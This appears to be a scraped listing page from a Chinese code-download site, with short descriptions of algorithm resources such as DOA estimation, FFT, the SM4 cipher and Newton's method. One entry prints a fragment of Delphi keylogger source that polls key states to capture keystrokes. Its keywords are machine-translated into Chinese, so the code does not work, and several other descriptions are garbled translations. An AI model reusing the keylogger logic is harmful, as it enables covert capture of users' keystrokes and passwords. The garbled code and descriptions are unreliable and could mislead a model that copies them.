-
谱峰搜索传播算子DOA估计
资源描述该算法无需对信源协方差矩阵进行特征值分解,大大降低运算复杂性,利用构造出的传播矩阵与导向矩阵的正交性构造一个函数,通过对角度进行搜索获得几个最大的谱峰值,谱峰值对应的角度即为信源的波达角估计值。
- 2022-11-07 14:30:02下载
- 积分:1
-
Calculadora Booleana
Calculadora booleana desarrollada en el 讲串口 utilizando el pic 16F887A
- 2022-07-16 20:32:58下载
- 积分:1
-
插值、拟合与规划问题
插值、拟合与规划问题
插值、拟合与规划问题
插值、拟合与规划问题-Interpolation, fitting with the planning of interpolation, fitting and planning issues
- 2022-01-27 16:00:47下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
FFT algorithm for software implementation, there are ways to explain, as well as...
FFT算法的软件实现,有方法讲解,也有部分C++的源码。-FFT algorithm for software implementation, there are ways to explain, as well as some C++ The source.
- 2022-01-22 17:12:34下载
- 积分:1
-
C程序小车加油
一个汽车加满油后可行驶n公里,由起点a到起点b为m公里。汽车出发时加满了油,途中设有k个加油站,d1是第一个加油站距起点的距离,di是第i个加油站距其前一个加油站的距离。设计一个算法,求出加油方案,使得加油次数最少即可到达终点。解决策略 汽车是由起点向终点行驶,现在面对的问题是应该在那个加油站加油,可使旅途过程中加油次数最少。为了解决该问题,我们可以规定在油箱中的油不足以使汽车行驶到下一个加油站的前提下,才加一次加油,如此
- 2022-02-06 23:59:50下载
- 积分:1
-
国密算法4的实现方法
国密算法4的实现方法,有源代码。可借用。sm4可以用软件方法实现。也可用硬件方法实现。国密4是对称算法的一种。 和 des 3des算法相似。 方法简单易懂。
- 2022-03-11 11:29:16下载
- 积分:1
-
Exceptional C++ shows by example how to go about solid software engineering. Alo...
Exceptional C++ shows by example how to go about solid software engineering. Along with a lot of other material, this book includes expanded versions of the first 30 issues of the popular Internet C++ feature Guru of the Week (or, in its short form, GotW), a series of self-contained C++ engineering problems and solutions that illustrate specific design and coding techniques.
- 2022-12-15 03:15:03下载
- 积分:1
-
没有计划到邻近的建立和遍历
无向图的邻接表的建立和遍历-no plans to the table adjacent to the establishment and ergodic
- 2023-03-05 15:30:03下载
- 积分:1
-
Newton down France
Newton下山法-Newton down France
- 2022-05-08 08:21:53下载
- 积分:1